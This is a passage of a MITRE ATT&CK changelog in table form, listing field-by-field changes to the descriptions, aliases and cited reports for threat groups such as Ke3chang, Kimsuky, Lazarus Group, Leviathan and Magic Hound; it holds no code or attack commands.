| [Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. [Ke3chang](https://attack.mitre.org/groups/G0004) has targeted several industries, including oil, government, military, and more.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018) | [Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. [Ke3chang](https://attack.mitre.org/groups/G0004) has targeted oil, government, diplomatic, military, and NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)(Citation: Microsoft NICKEL December 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Pooja Natarajan, NEC Corporation India', 'Manikantan Srinivasan, NEC Corporation India', 'Hiroki Nagahama, NEC Corporation'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-01 21:12:15.839000+00:00 | 2022-07-22 18:52:32.762000+00:00 |
| description | [Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. [Ke3chang](https://attack.mitre.org/groups/G0004) has targeted several industries, including oil, government, military, and more.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018) | [Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. [Ke3chang](https://attack.mitre.org/groups/G0004) has targeted oil, government, diplomatic, military, and NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)(Citation: Microsoft NICKEL December 2021) |
| external_references[1]['source_name'] | Ke3chang | RoyalAPT |
| external_references[1]['description'] | (Citation: Villeneuve et al 2014) (Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018) | (Citation: APT15 Intezer June 2018) |
| external_references[2]['source_name'] | APT15 | NICKEL |
| external_references[2]['description'] | (Citation: NCC Group APT15 Alive and Strong) | (Citation: Microsoft NICKEL December 2021) |
| external_references[3]['source_name'] | Mirage | APT15 |
| external_references[4]['source_name'] | Vixen Panda | Mirage |
| external_references[4]['description'] | (Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018) | (Citation: NCC Group APT15 Alive and Strong) |
| external_references[6]['source_name'] | Playful Dragon | Vixen Panda |
| external_references[6]['description'] | (Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018) | (Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018) |
| external_references[7]['source_name'] | RoyalAPT | Playful Dragon |
| external_references[7]['description'] | (Citation: APT15 Intezer June 2018) | (Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018) |
| external_references[8]['source_name'] | Mandiant Operation Ke3chang November 2014 | Ke3chang |
| external_references[8]['description'] | Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014. | (Citation: Villeneuve et al 2014) (Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018) |
| external_references[9]['source_name'] | NCC Group APT15 Alive and Strong | Microsoft NICKEL December 2021 |
| external_references[9]['description'] | Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018. | MSTIC. (2021, December 6). NICKEL targeting government organizations across Latin America and Europe. Retrieved March 18, 2022. |
| external_references[9]['url'] | https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ | https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe |
| external_references[10]['url'] | https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/ | https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/ |
| x_mitre_version | 1.4 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | NICKEL | |
| external_references | {'source_name': 'NCC Group APT15 Alive and Strong', 'description': 'Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.', 'url': 'https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/'} | |
| external_references | {'source_name': 'Mandiant Operation Ke3chang November 2014', 'description': 'Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014.', 'url': 'https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs'} | |
| external_references | {'source_name': 'Villeneuve et al 2014', 'description': 'Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014.', 'url': 'https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf'} |
| Description |
|---|
| [Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the United States, Russia, Europe, and the UN. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.(Citation: EST Kimsuky April 2019)(Citation: BRI Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky) [Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Taewoo Lee, KISA', 'Dongwook Kim, KISA'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 22:35:20.109000+00:00 | 2022-05-24 16:28:34.698000+00:00 |
| external_references[1]['source_name'] | Kimsuky | Thallium |
| external_references[1]['description'] | (Citation: Securelist Kimsuky Sept 2013)(Citation: Malwarebytes Kimsuky June 2021) | (Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021) |
| external_references[2]['source_name'] | STOLEN PENCIL | Black Banshee |
| external_references[2]['description'] | (Citation: Netscout Stolen Pencil Dec 2018) | (Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021) |
| external_references[3]['source_name'] | Thallium | STOLEN PENCIL |
| external_references[3]['description'] | (Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021) | (Citation: Netscout Stolen Pencil Dec 2018) |
| external_references[4]['source_name'] | Black Banshee | Kimsuky |
| external_references[4]['description'] | (Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021) | (Citation: Securelist Kimsuky Sept 2013)(Citation: Malwarebytes Kimsuky June 2021) |
| external_references[6]['source_name'] | EST Kimsuky April 2019 | AhnLab Kimsuky Kabar Cobra Feb 2019 |
| external_references[6]['description'] | Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019. | AhnLab. (2019, February 28). Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group. Retrieved September 29, 2021. |
| external_references[6]['url'] | https://blog.alyac.co.kr/2234 | https://global.ahnlab.com/global/upload/download/techreport/[Analysis_Report]Operation%20Kabar%20Cobra.pdf |
| external_references[7]['source_name'] | BRI Kimsuky April 2019 | EST Kimsuky April 2019 |
| external_references[7]['description'] | BRI. (2019, April). Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America. Retrieved October 7, 2019. | Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019. |
| external_references[7]['url'] | https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/ | https://blog.alyac.co.kr/2234 |
| external_references[8]['source_name'] | Cybereason Kimsuky November 2020 | Netscout Stolen Pencil Dec 2018 |
| external_references[8]['description'] | Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020. | ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019. |
| external_references[8]['url'] | https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite | https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/ |
| external_references[9]['source_name'] | Malwarebytes Kimsuky June 2021 | BRI Kimsuky April 2019 |
| external_references[9]['description'] | Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021. | BRI. (2019, April). Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America. Retrieved October 7, 2019. |
| external_references[9]['url'] | https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/ | https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/ |
| external_references[10]['source_name'] | CISA AA20-301A Kimsuky | Zdnet Kimsuky Dec 2018 |
| external_references[10]['description'] | CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020. | Cimpanu, C.. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019. |
| external_references[10]['url'] | https://us-cert.cisa.gov/ncas/alerts/aa20-301a | https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/ |
| external_references[11]['source_name'] | Netscout Stolen Pencil Dec 2018 | CISA AA20-301A Kimsuky |
| external_references[11]['description'] | ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019. | CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020. |
| external_references[11]['url'] | https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/ | https://us-cert.cisa.gov/ncas/alerts/aa20-301a |
| external_references[12]['source_name'] | EST Kimsuky SmokeScreen April 2019 | Cybereason Kimsuky November 2020 |
| external_references[12]['description'] | ESTSecurity. (2019, April 17). Analysis of the APT Campaign ‘Smoke Screen’ targeting to Korea and US 출처: https://blog.alyac.co.kr/2243 [이스트시큐리티 알약 블로그]. Retrieved September 29, 2021. | Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020. |
| external_references[12]['url'] | https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf | https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite |
| external_references[13]['source_name'] | AhnLab Kimsuky Kabar Cobra Feb 2019 | EST Kimsuky SmokeScreen April 2019 |
| external_references[13]['description'] | AhnLab. (2019, February 28). Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group. Retrieved September 29, 2021. | ESTSecurity. (2019, April 17). Analysis of the APT Campaign ‘Smoke Screen’ targeting to Korea and US 출처: https://blog.alyac.co.kr/2243 [이스트시큐리티 알약 블로그]. Retrieved September 29, 2021. |
| external_references[13]['url'] | https://global.ahnlab.com/global/upload/download/techreport/[Analysis_Report]Operation%20Kabar%20Cobra.pdf | https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf |
| external_references[14]['source_name'] | Securelist Kimsuky Sept 2013 | Malwarebytes Kimsuky June 2021 |
| external_references[14]['description'] | Tarakanov , D.. (2013, September 11). The “Kimsuky” Operation: A North Korean APT?. Retrieved August 13, 2019. | Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021. |
| external_references[14]['url'] | https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/ | https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/ |
| external_references[15]['source_name'] | Zdnet Kimsuky Dec 2018 | Securelist Kimsuky Sept 2013 |
| external_references[15]['description'] | Cimpanu, C.. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019. | Tarakanov , D.. (2013, September 11). The “Kimsuky” Operation: A North Korean APT?. Retrieved August 13, 2019. |
| external_references[15]['url'] | https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/ | https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/ |
| x_mitre_version | 3.0 | 3.1 |
| Description |
|---|
| [Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Kyaw Pyiyt Htet, @KyawPyiytHtet', 'Dragos Threat Intelligence'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/ |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 22:04:58.182000+00:00 | 2022-08-23 15:30:44.196000+00:00 |
| external_references[1]['source_name'] | Lazarus Group | Labyrinth Chollima |
| external_references[1]['description'] | (Citation: Novetta Blockbuster) | (Citation: CrowdStrike Labyrinth Chollima Feb 2022) |
| external_references[2]['source_name'] | HIDDEN COBRA | ZINC |
| external_references[2]['description'] | The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: US-CERT HOPLIGHT Apr 2019) | (Citation: Microsoft ZINC disruption Dec 2017) |
| external_references[3]['source_name'] | Guardians of Peace | Lazarus Group |
| external_references[3]['description'] | (Citation: US-CERT HIDDEN COBRA June 2017) | (Citation: Novetta Blockbuster) |
| external_references[4]['source_name'] | ZINC | NICKEL ACADEMY |
| external_references[4]['description'] | (Citation: Microsoft ZINC disruption Dec 2017) | (Citation: Secureworks NICKEL ACADEMY Dec 2017) |
| external_references[5]['source_name'] | NICKEL ACADEMY | Guardians of Peace |
| external_references[5]['description'] | (Citation: Secureworks NICKEL ACADEMY Dec 2017) | (Citation: US-CERT HIDDEN COBRA June 2017) |
| external_references[6]['source_name'] | US-CERT HIDDEN COBRA June 2017 | CrowdStrike Labyrinth Chollima Feb 2022 |
| external_references[6]['description'] | US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017. | CrowdStrike. (2022, February 1). CrowdStrike Adversary Labyrinth Chollima. Retrieved February 1, 2022. |
| external_references[6]['url'] | https://www.us-cert.gov/ncas/alerts/TA17-164A | https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/ |
| external_references[7]['source_name'] | Treasury North Korean Cyber Groups September 2019 | Novetta Blockbuster |
| external_references[7]['description'] | US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. |
| external_references[7]['url'] | https://home.treasury.gov/news/press-releases/sm774 | https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf |
| external_references[8]['source_name'] | Novetta Blockbuster | Secureworks NICKEL ACADEMY Dec 2017 |
| external_references[8]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. | Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017. |
| external_references[8]['url'] | https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf | https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing |
| external_references[9]['source_name'] | US-CERT HOPLIGHT Apr 2019 | Microsoft ZINC disruption Dec 2017 |
| external_references[9]['description'] | US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019. | Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017. |
| external_references[9]['url'] | https://www.us-cert.gov/ncas/analysis-reports/AR19-100A | https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/ |
| external_references[10]['source_name'] | Microsoft ZINC disruption Dec 2017 | HIDDEN COBRA |
| external_references[10]['description'] | Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017. | The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: US-CERT HOPLIGHT Apr 2019) |
| external_references[11]['source_name'] | Secureworks NICKEL ACADEMY Dec 2017 | Treasury North Korean Cyber Groups September 2019 |
| external_references[11]['description'] | Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017. | US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021. |
| external_references[11]['url'] | https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing | https://home.treasury.gov/news/press-releases/sm774 |
| x_mitre_version | 2.0 | 3.1 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | Labyrinth Chollima | |
| external_references | {'source_name': 'US-CERT HIDDEN COBRA June 2017', 'description': 'US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA17-164A'} | |
| external_references | {'source_name': 'US-CERT HOPLIGHT Apr 2019', 'description': 'US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.', 'url': 'https://www.us-cert.gov/ncas/analysis-reports/AR19-100A'} |
| Description |
|---|
| [Leviathan](https://attack.mitre.org/groups/G0065) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.(Citation: CISA AA21-200A APT40 July 2021) Active since at least 2009, [Leviathan](https://attack.mitre.org/groups/G0065) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.crowdstrike.com/blog/two-birds-one-stone-panda/ |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 20:34:57.289000+00:00 | 2022-04-15 15:15:51.198000+00:00 |
| external_references[1]['source_name'] | Leviathan | MUDCARP |
| external_references[1]['description'] | (Citation: Proofpoint Leviathan Oct 2017) | (Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019) |
| external_references[2]['source_name'] | MUDCARP | Kryptonite Panda |
| external_references[2]['description'] | (Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019) | (Citation: CISA AA21-200A APT40 July 2021)(Citation: Crowdstrike KRYPTONITE PANDA August 2018) |
| external_references[3]['source_name'] | Kryptonite Panda | Gadolinium |
| external_references[3]['description'] | (Citation: CISA AA21-200A APT40 July 2021)(Citation: Crowdstrike KRYPTONITE PANDA August 2018) | (Citation: CISA AA21-200A APT40 July 2021)(Citation: MSTIC GADOLINIUM September 2020) |
| external_references[4]['source_name'] | Gadolinium | BRONZE MOHAWK |
| external_references[4]['description'] | (Citation: CISA AA21-200A APT40 July 2021)(Citation: MSTIC GADOLINIUM September 2020) | (Citation: CISA AA21-200A APT40 July 2021)(Citation: SecureWorks BRONZE MOHAWK n.d.) |
| external_references[5]['source_name'] | BRONZE MOHAWK | Leviathan |
| external_references[5]['description'] | (Citation: CISA AA21-200A APT40 July 2021)(Citation: SecureWorks BRONZE MOHAWK n.d.) | (Citation: Proofpoint Leviathan Oct 2017) |
| external_references[6]['description'] | Leviathan was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye APT40 March 2019) | [Leviathan](https://attack.mitre.org/groups/G0065) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye APT40 March 2019) |
| external_references[7]['source_name'] | APT40 | TEMP.Periscope |
| external_references[7]['description'] | FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019) | [Leviathan](https://attack.mitre.org/groups/G0065) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019) |
| external_references[8]['source_name'] | TEMP.Periscope | Accenture MUDCARP March 2019 |
| external_references[8]['description'] | Leviathan was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019) | Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021. |
| external_references[9]['source_name'] | CISA AA21-200A APT40 July 2021 | Crowdstrike KRYPTONITE PANDA August 2018 |
| external_references[9]['description'] | CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department.. Retrieved August 12, 2021. | Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021. |
| external_references[9]['url'] | https://us-cert.cisa.gov/ncas/alerts/aa21-200a | https://www.crowdstrike.com/blog/two-birds-one-stone-panda/ |
| external_references[11]['source_name'] | FireEye Periscope March 2018 | MSTIC GADOLINIUM September 2020 |
| external_references[11]['description'] | FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. | Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021. |
| external_references[11]['url'] | https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html | https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/ |
| external_references[12]['source_name'] | Accenture MUDCARP March 2019 | CISA AA21-200A APT40 July 2021 |
| external_references[12]['description'] | Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021. | CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department. Retrieved August 12, 2021. |
| external_references[12]['url'] | https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies | https://us-cert.cisa.gov/ncas/alerts/aa21-200a |
| external_references[13]['source_name'] | Crowdstrike KRYPTONITE PANDA August 2018 | APT40 |
| external_references[13]['description'] | Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021. | FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019) |
| external_references[14]['source_name'] | MSTIC GADOLINIUM September 2020 | FireEye Periscope March 2018 |
| external_references[14]['description'] | Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021. | FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. |
| external_references[14]['url'] | https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/ | https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html |
| external_references[15]['source_name'] | SecureWorks BRONZE MOHAWK n.d. | FireEye APT40 March 2019 |
| external_references[15]['description'] | SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021. | Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019. |
| external_references[15]['url'] | https://www.secureworks.com/research/threat-profiles/bronze-mohawk | https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html |
| external_references[16]['source_name'] | FireEye APT40 March 2019 | SecureWorks BRONZE MOHAWK n.d. |
| external_references[16]['description'] | Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019. | SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021. |
| external_references[16]['url'] | https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html | https://www.secureworks.com/research/threat-profiles/bronze-mohawk |
| Old Description | New Description |
|---|---|
| [Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted U.S. and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021) | [Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks 